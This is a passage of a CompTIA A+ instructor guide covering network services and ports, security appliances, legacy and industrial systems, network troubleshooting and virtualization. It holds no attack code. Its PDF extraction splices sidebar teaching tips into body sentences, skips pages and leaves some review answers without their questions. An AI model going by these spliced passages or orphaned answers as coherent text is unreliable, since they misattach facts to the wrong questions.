also used to separate nodes based on traffic type, such as isolating devices used for
VoIP so that they can more easily be prioritized over data passing over other VLANs.
The VPN described above is for remote access to the LAN by teleworkers and roaming
users. VPNs can also be used to connect sites over public networks, such as linking
branch offices to a head office, or within a local network as an additional security
mechanism.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 197
Review Activity:
Network Configuration Concepts
6
1. You need to ensure that a print device receives the same IP address
Teaching
when connecting to the network. What value do you need to configure
Tip
on the DHCP server to enable a reservation?
Take some time at
The reservation should be configured with the media access control (MAC) address the end of each topic
of the print device (plus the IP address to assign). to answer questions.
You can use the
2. True or false? A top-level domain such as .com represents the top of the review questions
for discussion in
DNS hierarchy. class or set them for
students to complete
False. The Domain Name System (DNS) uses root servers at the top of the hierarchy. individually during or
The root is represented by a trailing dot at the end of a fully qualified domain name after class.
(FQDN), though this can very commonly be omitted in ordinary usage.
The role of a name server is to respond to queries for the resource records of the
specific domain(s) that it is responsible for. The role of the DNS server types listed
in a client’s IP configuration is to resolve requests for records in any valid domain.
To do this, the resolver must take on the task of querying multiple name servers
on behalf of the client. Mixing these roles on the same server machine is possible
in theory, but for performance and security reasons, they are more commonly
performed by separate servers.
4. What type of value would you expect a query for an AAAA resource
record to return?
An IPv6 address.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
198 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Lesson 5
Summary
7
Show You should be able to compare Internet connection types, TCP/IP protocols, and
Slide(s) common network configuration concepts and to configure SOHO routers and
Summary clients.
Teaching
Guidelines for Installing and Configuring SOHO Networks
Tip Follow these guidelines to install and configure a SOHO network:
Try to include some
time at the end • Identify the most suitable Internet connection type from those available,
of each lesson to considering ADSL, cable, FTTC/VDSL, FTTP/full fiber, WISP, satellite, or cellular
check students’ (4G/5G).
understanding and
answer questions. • Either use the ISP-provided SOHO router or provision a router and/or modem
to work with the Internet connection type and check that the WAN interface is
Interaction cabled or connected correctly to the service provider network.
Opportunity
Get students to
• Use a computer to connect to the router interface over a LAN port or Wi-Fi and
browse vendor sites to verify the status of the Internet connection.
identify different types
and costs of network • Optionally, adjust DHCP settings to customize the address scope or configure
hardware: reservations.
• FTTC/VDSL
broadband • If configuring one or more hosts with static addresses, ensure each has an IPv4
packages. address and subnet mask that is consistent with the DHCP private address range
• Full fiber scope and address scope. Configure the router IP address as the default gateway
broadband and optionally as the primary DNS server. If using IPv6, configure an address and
packages. network prefix that is consistent with the settings on the router.
• 5G fixed access
broadband
• Verify that the router is configured to use trusted DNS resolvers, such as those
packages. of the ISP.
• Satellite
• If allowing Internet connections through the firewall, identify the TCP and UDP
broadband
packages.
protocols and ports that need to be opened.
• WISP broadband • If allowing Internet connections and maintaining a domain name, consider which
packages. services need to be published as address, MX, and TXT records to allow Internet
• SOHO router hosts to connect to web and email servers in the domain.
with VDSL and 5G
backup. • If expanding the network, consider requirements to use managed switches,
• SOHO router with VLANs, and IP subnets to divide the LAN into multiple broadcast domains and to
full fiber and Wi-Fi allow remote access via a VPN.
6 support.
Additional practice questions for the topics covered in this lesson are available on the
CompTIA Learning Center.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Lesson 6
Supporting Network Services
1
LESSON INTRODUCTION
Application protocols implement services such as web browsing, email, and file Show
sharing. As well as computer server roles, modern networks use a variety of Slide(s)
Internet security appliances and smart devices. Some networks are integrated Objectives
with embedded system devices that underpin industrial technologies. While you
will not have responsibility for configuring the devices and servers that run these Teaching
applications, being able to summarize the functions and purposes of server roles Tip
will help you to assist other technicians. This lesson continues
with the networking
Being able to summarize the function of protocols all the way up the network stack
theme, moving up
is also a prerequisite for troubleshooting network issues. When you are diagnosing the stack to cover
connectivity problems with a host, you need to determine whether the issue is application protocols
with a cable or adapter that you can resolve or whether there is a wider network or and server roles plus
application server issue that you will need to escalate to senior support staff. troubleshooting.
Lesson Objectives
In this lesson, you will:
• Summarize services provided by networked hosts.
• Troubleshoot networks.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
200 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Topic 6A
Show
Slide(s)
Summarize Services Provided by
Summarize Services
Provided by
Networked Hosts
Networked Hosts 2
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 201
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
202 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Using Firefox’s web developer tools to inspect the HTTP requests and response headers
involved in serving a typical modern web page. (Screenshot courtesy of Mozilla.)
• The host location is usually represented by a FQDN. The FQDN is not case
sensitive. The host location can also be an IP address; an IPv6 address must be
enclosed in square brackets.
• The file path specifies the directory and file name location of the resource (if
required). The file path may or may not be case sensitive, depending on how the
server is configured.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 203
URL for an HTTPS website. The site is identified by the FQDN store.comptia.org and
the requested resource is in the file path /bundles/aplus.html from the site root.
To implement HTTPS, the web server is installed with a digital certificate issued Interaction
by some trusted certificate authority (CA). The certificate uses encrypted data to Opportunity
prove the identity of the server to the client, assuming that the client also trusts the If you have an Internet
CA. The system uses a public/private encryption key pair. The private key is kept connection, get
a secret known only to the server; the public key is given to clients via the digital students to open a
certificate. secure site and view
the certificate.
The server and client use the key pair in the digital certificate and a chosen cipher
suite within the TLS protocol to set up an encrypted tunnel. Even though someone
else might know the public key, they cannot decrypt the contents of the tunnel
without obtaining the server’s private key. This means that the communications
cannot be read or changed by a third party.
A web browser will open a secure session to an HTTPS server by using a URL
starting with https:// and it will also show a padlock icon in the address bar to
indicate that the server’s certificate is trusted and that the connection is secure. A
website can be configured to require a secure session and reject or redirect plain
HTTP requests.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
204 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Mail Servers
Show Electronic mail enables a person to compose a message and send it to another
Slide(s) user on their own network (intranet) or anywhere in the world via the Internet. Two
Mail Servers types of mail servers and protocols are used to process email: mail transfer and
mailbox access protocols:
Teaching
Tip
While they are
not listed on the
syllabus, stress the
importance of using
encrypted versions
of these protocols
for client-to-server
communications. Note
that server-to-server
SMTP is more difficult
to encrypt but that
solutions exist for
message encryption at
the client (S/MIME or
PGP).
Internet email addresses follow the mailto URL scheme. An Internet email address
comprises two parts—the username (local part) and the domain name, separated
by an @ symbol. The domain name may refer to a company or an ISP; for example,
[email protected] or [email protected].
The Simple Mail Transfer Protocol (SMTP) specifies how email is delivered
from one mail domain to another. The SMTP server of the sender discovers the
IP address of the recipient SMTP server by using the domain name part of the
recipient’s email address. The SMTP servers for the domain are registered in DNS
using Mail Exchange (MX) and host (A/AAAA) records.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 205
Typical SMTP configurations use the following ports and secure services:
• Port TCP/25 is used for message relay between SMTP servers, or message
transfer agents (MTAs). Transmissions over port 25 are usually unsecure.
Mailbox Servers
SMTP is used only to deliver mail to server hosts that are permanently available. Show
When an email is received by an SMTP server, it delivers the message to a mailbox Slide(s)
server. The mailbox server could be a separate machine or a separate process Mailbox Servers
running on the same computer. A mailbox access protocol allows the user’s client
email software to retrieve messages from the mailbox.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
206 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
With AAA, the network access appliances do not have to store any authentication
credentials. They simply act as a transit to forward this data between the AAA server
and the supplicant. AAA is often implemented using a protocol called Remote
Authentication Dial-in User Service (RADIUS).
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 207
Show
Remote Terminal Access Servers Slide(s)
Remote Terminal
A remote terminal server allows a host to accept connections to its command shell Access Servers
or graphical desktop from across the network. The name “terminal” comes from
the early days of computing where configuration was performed by a teletype Teaching
(TTY) device. The TTY is the terminal or endpoint for communication between the Tip
computer and the user. It handles text input and output between the user and the Explain that these
shell, or command environment. Where the terminal accepts input and displays protocols allow a
output, the shell performs the actual processing. user or administrator
to operate a host
A terminal emulator is any kind of software that replicates this TTY input/output remotely. The host
function. A given terminal emulator application might support connections to could be on the
multiple types of shell. A remote terminal emulator allows you to connect to the same local network
or accessed over the
shell of a different host over the network. Internet. Make sure
students understand
Secure Shell the importance
of using a secure
Secure Shell (SSH) is the principal means of obtaining secure remote access to remote terminal
UNIX and Linux servers and to most types of network appliances (switches, routers, access protocol (and,
and firewalls). As well as encrypted terminal emulation, SSH can be used for SFTP conversely, the risks
and to achieve many other network configurations. Numerous commercial and from using Telnet).
open source SSH servers and terminal emulation clients are available for all the Remind learners that
major NOS platforms (UNIX®, Linux®, Windows®, and macOS®). The most widely a remote terminal
used is OpenSSH (openssh.com). An SSH server listens on port TCP/22 by default. server can be any type
of computer. "Server"
here doesn’t have
Telnet to mean a server-
class computer; it
Telnet is both a protocol and a terminal emulation software tool that transmits can include a service
shell commands and output between a client and the remote host. A Telnet server running on a desktop
listens on port TCP/23 by default. PC or laptop.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
208 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
A Telnet interface can be password protected, but the password and other
communications are not encrypted and therefore could be vulnerable to packet
sniffing and replay. Historically, Telnet provided a simple means to configure switch
and router equipment, but only secure access methods should be used for these
tasks now.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 209
The management system monitors all agents by polling them at regular intervals for
information from their MIBs and displays the information for review. It also displays
any trap operations as alerts for the network administrator to assess and act upon
as necessary.
SNMP device queries take place over port UDP/161; traps are communicated over
port UDP/162.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
210 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Syslog
Effective network management often entails capturing logs from different devices.
It is more efficient to review logs and respond to alerts if the logs are consolidated
on a single system. A log collector aggregates event messages from numerous
devices to a single storage location. As well as aggregating logs, the system can be
configured to run one or more status and alerting dashboards.
Syslog is an example of a protocol and supporting software that facilitates log
collection. It has become a de facto standard for logging events from distributed
systems. For example, syslog messages can be generated by routers and switches,
as well as UNIX or Linux servers and workstations. A syslog collector usually listens
on port UDP/514.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 211
Review Activity:
Services Provided by Networked Hosts
3
1. True or false? An HTTP application secured using the SSL/TLS protocol Show
should use a different port to unencrypted HTTP. Slide(s)
Review
True. By default, HTTPS uses port TCP/443. It is possible in theory to apply SSL/TLS
to port TCP/80, but most browsers would not support this configuration. Teaching
2. A firewall filters applications based on their port number. If you want to Tip
configure a firewall on a mail server to allow clients to download email Take some time at
messages, which port(s) might you have to open? the end of each topic
to answer questions.
Either TCP port 993 (IMAPS) or 995 (POP3S), depending on the mail access protocol You can use the
review questions
in use (IMAP or POP). These are the default ports for secure connections. Unsecure for discussion in
default ports are TCP port 143 and TCP port 110. Port 25 (SMTP) is used to send class or set them for
mail between servers and not to access messages stored on a server. Port 587 is students to complete
often used by a client to submit messages for delivery by an SMTP server. individually during or
after class.
3. You are configuring a network attached storage (NAS) appliance. What
file sharing protocol(s) could you use to allow access to Windows, Linux,
and Apple macOS clients?
Most clients should support Server Message Block (SMB). Another option is to
configure File Transfer Protocol (FTP).
4. True or false? AAA allows switches and access points to hold directory
information so that they can authenticate clients as they connect to the
network.
The Simple Network Management Protocol (SNMP) provides a means for devices
to report operational statistics to a management server and to send a trap if a
threshold for some critical value is exceeded. Syslog provides a means for devices
to send log entries to a remote server. Both of these types of information are
required for effective monitoring.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
212 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Topic 6B
Compare Internet and Embedded
Appliances
6
Show As well as the roles fulfilled by computer servers, most networks also require
Slide(s) dedicated Internet security appliances and must manage embedded systems and
Compare Internet and legacy systems. Internet security appliances are installed to the network border to
Embedded Appliances filter content and improve performance. Embedded devices might be present on
the network as features of industrial or building control systems or as Internet of
Teaching Things devices installed to office workspaces. As an A+ technician, it is important
Tip that you can compare and contrast the functions of these types of appliances
This topic completes and embedded devices so that you can support and troubleshoot networks more
coverage of objective effectively.
2.4 with an overview
of devices that don’t fit
easily into the schema Proxy Servers
of the previous topics.
As with other topics in On a SOHO network, devices on the LAN access the Internet via the router using
this lesson, focus on a type of NAT, specifically port-based or overloaded NAT. This type of NAT device
the purpose of each translates between the private IP addresses used on the LAN and the publicly
device rather than
configuration detail.
addressable IP address configured on the router’s WAN interface.
Many enterprise networks also use some sort of NAT, but another option is to
Show deploy a proxy server. A proxy server does not just translate IP addresses. It takes
Slide(s) a whole HTTP request from a client, checks it, then forwards it to the destination
Proxy Servers server on the Internet. When the reply comes back, it checks it and then shuttles it
back to the LAN computer. A proxy can be used for other types of traffic, too (email,
for instance).
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 213
• Firewalls allow or block traffic based on a network access control list specifying
source and destination IP addresses and application ports.
• Intrusion detection systems (IDS) are programmed with scripts that can identify
known malicious traffic patterns. An IDS can raise an alert when a match is
made. An intrusion prevention system (IPS) can additionally take some action to
block the source of the malicious packets.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
214 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
• Spam gateways use SPF, DKIM, and DMARC to verify the authenticity of mail
servers and are configured with filters that can identify spoofed, misleading,
malicious, or otherwise unwanted messages. The spam gateway is installed as
a network server to filter out these messages before it is delivered to the user’s
inbox.
• Content filters are used to block outgoing access to unauthorized websites and
services.
• Data leak/loss prevention (DLP) systems scan outgoing traffic for information
that is marked as confidential or personal. The DLP system can verify whether
the transfer is authorized and block it if it is not.
Load Balancers
Show A load balancer can be deployed to distribute client requests across server nodes
Slide(s) in a farm or pool. You can use a load balancer in any situation where you have
Load Balancers multiple servers providing the same function. Examples include web servers, email
servers, web conferencing servers, and streaming media servers. The load balancer
is placed in front of the server network and distributes requests from the client
network or Internet to the application servers. The service address is advertised to
clients as a virtual server. This is used to provision high availability services that can
scale from light to heavy loads.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 215
Legacy Systems
A legacy system is one that is no longer directly supported by its vendor. This Show
might be because the vendor has gone out of business or formally deprecated use Slide(s)
of the product. A product that is no longer supported is referred to as end of life Legacy Systems
(EOL). Networks often need to retain hosts running legacy OSs and applications
software or old-style mainframe computers to run services that are too complex or Teaching
expensive to migrate to a more modern platform. Tip
Legacy systems usually work well for what they do—which is why they don’t get Note that the
content example
prioritized for replacement—but they represent severe risks in terms of security suggests a false
vulnerabilities. If attackers discover faulty code that they can use to try to exploit equivalence between
the device, the vendor will not be available to develop a software patch to block legacy systems
the exploit. It is important to isolate them as far as possible from the rest of the and embedded
network and to ensure that any network channels linking them are carefully systems. Some of the
management and
protected and monitored.
security concerns
are similar, but they
Embedded Systems and SCADA should be treated
separately.
An embedded system is an electronic device that is designed to perform a specific, Security concepts
dedicated function. These systems can be as small and simple as a microcontroller such as patching
in an intravenous drip-rate meter or as large and complex as an industrial control are covered in more
system managing a water treatment plant. Embedded systems might typically detail in Core 2. The
basic terminology of
have been designed to operate within a closed network, where the elements of vulnerabilities and
the network are all known to the system vendor and there is no connectivity to exploits should be
wider computer data networks. Where embedded systems need to interact within familiar to students
a computer data network, there are special considerations to make in terms of the from IT Fundamentals,
network design and support, especially regarding security. but you may need to
provide additional
background
Workflow and Process Automation Systems information if students
have not completed
An industrial control system (ICS) provides mechanisms for workflow and process that course.
automation. An ICS controls machinery used in critical infrastructure, such as
power suppliers, water suppliers, health services, telecommunications, and national Show
security services. Slide(s)
An ICS comprises plant devices and equipment with embedded programmable Embedded Systems
logic controllers (PLCs). The PLCs are linked by a cabled network to actuators that and SCADA
operate valves, motors, circuit breakers, and other mechanical components, plus
Teaching
sensors that monitor some local state, such as temperature. An embedded system
Tip
network is usually referred to as an operational technology (OT) network to
distinguish it from an IT network. Output and configuration of a PLC is performed This terminology
unpacks some of
by a human–machine interface (HMI). An HMI might be a local control panel or
the detail behind
software running on a computing host. PLCs are connected within a control loop, the single content
and the whole process automation system can be governed by a control server. example SCADA.
Another important concept is the data historian, which is a database of all the
information generated by the control loop.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
216 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Both legacy and embedded systems represent a risk in terms of maintenance and
troubleshooting as well as security, because they tend to require more specialized
knowledge than modern, off-the-shelf, computing systems. Consultants with expertise in
such systems can become highly sought after.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 217
Review Activity:
Internet and Embedded Appliances
7
1. You are advising a customer about replacing the basic network address Show
translation (NAT) function performed by a SOHO router with a device Slide(s)
that can work as a proxy. The customer understands the security Review
advantages of this configuration. What other benefit can it have?
Teaching
The proxy can be configured to cache data that is commonly requested by multiple
Tip
clients, reducing bandwidth consumption and speeding up requests.
Take some time at
2. You are recommending that a small business owner replace separate the end of each topic
firewall and antimalware appliances with a UTM. What is the principal to answer questions.
You can use the
advantage of doing this? review questions
for discussion in
A unified threat management (UTM) appliance consolidates the configuration, class or set them for
monitoring, and reporting of multiple security functions to a single console students to complete
or dashboard. You might also mention that the UTM might provide additional individually during or
functionality not currently available, such as intrusion detection, spam filtering, or after class.
data loss prevention.
A load balancer.
5. You are auditing your network for the presence of legacy systems.
Should you focus exclusively on identifying devices and software whose
vendor has gone out of business?
No. While this can be one reason for products becoming unsupported, vendors can
also deprecate use of products that they will no longer support by classifying them
as end of life (EOL).
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
218 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Topic 6C
Show
Slide(s) Troubleshoot Networks
Troubleshoot
6
Networks
CORE 1 EXAM OBJECTIVES COVERED
Teaching 5.7 Given a scenario, troubleshoot problems with wired and wireless networks.
Tip
This troubleshooting
topic completes
coverage of local
As a CompTIA A+ technician, you often assist users with basic network connectivity
networking concepts. issues. At this support level, you will be focusing on client issues. As you have
Most of the examples learned, networks are complex and involve many different hardware devices,
focus on physical/data protocols, and applications, meaning that there are lots of things that can go
link layer issues, but wrong! In this topic, you will learn how to identify and diagnose the causes of some
some do introduce
common wired and wireless network issues.
new concepts, such as
VoIP.
Troubleshoot Wired Connectivity
Show A client wired connectivity issue means that either the network adapter does not
Slide(s) establish a network link at all (no connectivity) or the connection is unstable or
intermittent. Assuming that you can establish that the problem affects a single host
Troubleshoot Wired
Connectivity only, you need to isolate the precise location of the physical issue.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 219
4. If you can discount faulty patch cords and bad network ports/NICs, use a cable
tester to verify the structured cabling. The solution may involve installing
a new permanent link, but there could also be a termination or external
interference problem. An advanced type of cable tester called a “certifier” can
report detailed information about cable performance and interference.
2. If you can isolate the speed issue to a single cable segment, the cabling
could be affected by interference. External interference is typically
caused by nearby power lines, fluorescent lighting, motors, and generators.
Poorly installed cabling and connector termination can also cause a type
of interference called “crosstalk.” Check the ends of cables for excessive
untwisting of the wire pairs or improper termination. If you have access
to a network tap, the analyzer software is likely to report high numbers of
damaged frames. You can also view error rates from the switch interface
configuration utility.
3. If the cabling is not the issue, there could be a problem with the network
adapter driver. Install an update if available. If the latest driver is installed,
check whether the issue affects other hosts using the same NIC and driver
version.
4. Consider the possibility that the computer could be infected with malware or
have faulty software installed. Consider removing the host from the network
for scanning. If you can install a different host to the same network port and
that solves the issue, identify what is different about the original host.
5. Establish the scope of the problem: are network speeds an issue for a single
user, for all users connected to the same switch, or for all users connecting to
the Internet, for instance? There may be congestion at a switch or router or
some other network-wide problem. This might be caused by a fault or by user
behavior, such as transferring a very large amount of data over the network.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
220 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 221
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
222 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
• Jitter is the amount of variation in delay over time and is measured by sampling
the elapsed time between packets arriving. VoIP can use buffering to tolerate
jitter of up to around 30 ms without severe impact on call quality. Jitter is
typically caused by network congestion affecting packet processing on routers
and switches.
VoIP call quality can only really be established by using a quality of service (QoS)
mechanism across the network. QoS means that switches, access points, and
routers are all configured to identify VoIP data and prioritize it over bursty data.
Enterprise networks can deploy sophisticated QoS and traffic engineering protocols
on managed switches and routers. However, it is difficult to guarantee QoS over a
public network, such as the Internet.
On a SOHO network, you may be able to configure a QoS or bandwidth control
feature on the router/modem to prioritize the port used by a VoIP application over
any other type of protocol. This will help to mitigate issues if, for example, one
computer is trying to download a Windows 10 feature update at the same time as
another set of computers are trying to host a video conference.
You should also be able to use the management interface to report connection
latency and possibly jitter too. If not, you can use a speed test site to measure
latency and bandwidth. If latency is persistently higher than an agreed service level,
contact your ISP to resolve the issue.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 223
• Check the VLAN configuration—If the switch port is not configured with the
correct VLAN ID, it can have the same effect as connecting the host to the wrong
switch port.
Windows may also report that a network adapter has no Internet access. This
means that the adapter has obtained an IP configuration (or is configured statically)
but cannot reach msftncsi.com to download a test file. This error indicates that
there is an issue with either Internet access at the gateway router or name
resolution. On a SOHO network, access the router management interface and verify
the Internet connection via a status update page. If the link is down, contact your
ISP. The router may also have tools to test connectivity. Verify that it can connect to
the servers configured for DNS.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
224 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Review Activity:
Networks
7
Show 1. You are updating a support knowledge base article to help technicians
Slide(s) identify port flapping. How can port flapping be identified?
Review
Use the switch configuration interface to observe how long the port remains in
Teaching an up state. Port flapping means that the port transitions rapidly between up and
Tip down states.
Take some time at 2. A user reports that the Internet is slow. What first step should you take
the end of each topic
to identify the problem?
to answer questions.
You can use the
Verify the link speed independently of user apps, such as web browsing, to
review questions
for discussion in determine if there is a cable or port problem.
class or set them for
students to complete 3. You are trying to add a computer to a wireless network but cannot
individually during or detect the network name. What possible causes should you consider?
after class.
The network name is configured as nonbroadcast and must be entered manually,
the wireless standard supported by the adapter is not supported by the access
point, the station is not in range, or there is some sort of interference.
The signal strength of different Wi-Fi networks and their channels that are operating
within range of the analyzer.
5. A probe reports that the Internet connection has RTT latency of 200 ms.
What is the likely impact on VoIP call quality?
Most vendors recommend that one-way latency should not exceed 150 ms. Round
trip time (RTT) measures two-way latency, so 200 ms is within the recommended
300 ms tolerance. Call quality should not be severely impacted, but if latency is
persistently that high, it might be worth investigating the cause.
No. Limited connectivity reported by the OS means that the link has been
established, but the host has not been able to contact a DHCP server to obtain a
lease for a valid configuration.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 225
Lesson 6
Summary
7
You should be able to summarize services provided by networked hosts and Show
troubleshoot common problems with wired and wireless links. Slide(s)
Summary
Guidelines for Supporting Networks
Teaching
Follow these guidelines to support network services and troubleshoot common
Tip
problems:
Try to include some
• Document the server roles, such as the following: time at the end
of each lesson to
• File/print services based on SMB over port TCP/445 or over legacy NetBIOS check students’
over TCP/IP ports UDP/137 and TCP/139. understanding and
answer questions.
• FTP over port TCP/21 and TCP/20.
• Web services over HTTP port TCP/80 and HTTP Secure over port TCP/443.
• SMTP over port TCP/25 for server-to-server transport or TCP/587 for clients to
submit messages for delivery.
• Mailbox services such as POP3 over TCP/110 and TCP/995 (secure) and IMAP
over TCP/143 and TCP/993 (secure).
• DHCP network addressing over UDP/67+68 and DNS name resolution over
UDP/53.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
226 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Additional practice questions for the topics covered in this lesson are available on the
CompTIA Learning Center.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Lesson 7
Summarizing Virtualization and
Cloud Concepts
1
LESSON INTRODUCTION
The use of virtualization to run multiple OS and application environments on a Show
single hardware platform has huge impacts on modern computing. Delivering Slide(s)
environments for testing and training is made much more straightforward, and Objectives
there are security and management benefits of provisioning servers and desktops
as virtual machines. Teaching
Virtualization is also the technology underpinning cloud computing. Cloud is one of Tip
the most dominant trends in networking and service provision. Many organizations IT service provision
is increasingly
are outsourcing parts of their IT infrastructure, platforms, storage, or services to
based around these
cloud solutions providers. Virtualization is at the core of cloud service provider technologies, so
networks. If you can compare and contrast the delivery and service models for students will need a
cloud, your customers will benefit from your advice and support when deploying good grasp of them to
cloud resources. progress their careers.
Lesson Objectives
In this lesson, you will:
• Summarize client-side virtualization.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
228 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Topic 7A
Summarize Client-Side Virtualization
2
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 229
Type I bare metal hypervisor. The hypervisor is installed directly on the host hardware
along with a management application, then VMs are installed within the hypervisor.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
230 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
• Support legacy software applications and OSs—If the host computers have
been upgraded, software apps may not work well with the new OS. In this
scenario, the old OS can be installed as a VM, and the application software
accessed using the VM.
Server-Side Virtualization
Server-side virtualization means deploying a server role as a virtual machine.
For server computers and applications, the main use of virtualization is better
hardware utilization through server consolidation. A typical hardware server
may have resource utilization of about 10%. This implies that you could pack the
server computer with another 8–9 server software instances and obtain the same
performance.
Application Virtualization
Application virtualization means that the client either accesses a particular
application hosted on a server or streams the application from the server for local
processing. This enables programmers and application administrators to ensure
that the application used by clients is always updated with the latest code.
Most application virtualization solutions are based on Citrix XenApp. Microsoft has
developed an App-V product within its Windows Server range. VMware has the
ThinApp product.
Container Virtualization
Container virtualization dispenses with the idea of a hypervisor and instead
enforces resource separation at the OS level. The OS defines isolated containers
for each user instance to run in. Each container is allocated CPU and memory
resources, but the processes all run through the native OS kernel.
These containers may run slightly different OS distributions but cannot run guest
OSs of different types (you could not run Windows or Ubuntu in a RedHat Linux
container, for instance). Alternatively, the containers might run separate application
processes, in which case, the variables and libraries required by the application
process are added to the container.
One of the best-known container virtualization products is Docker (docker.com).
Containerization is also being widely used to implement corporate workspaces on
mobile devices.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 231
CPU vendors have built special instruction sets to improve virtualization performance. Teaching
The Intel technology for this is called “VT-x” (Virtualization Technology), while AMD Tip
calls it “AMD-V.” Most virtualization products also benefit from a processor feature Note that the “x” in
called “Second Level Address Translations” (SLAT), which improves the performance VTx stands for x86-64.
of virtual memory when multiple VMs are installed. Intel implements SLAT as a Intel® developed
feature called “Extended Page Table” (EPT), and AMD calls it “Rapid Virtualization a different 64-bit
Indexing” (RVI). architecture called
“Itanium” (IA-64). VT-i
Most virtualization software requires a CPU with virtualization support enabled, and extensions are for
even if there is no formal requirement, performance of the VMs will be impaired if that architecture.
hardware-assisted virtualization is not available. Some cheaper CPU models ship VT-x is for the AMD-
developed 64-bit
without the feature, and it may be disabled in the system firmware. If specifying a architecture, which
computer that will be used for virtualization, check the CPU specification carefully to proved much more
confirm that it supports Intel VT-x or AMD-V and SLAT and verify that these features successful because it
are enabled via system setup. was more compatible
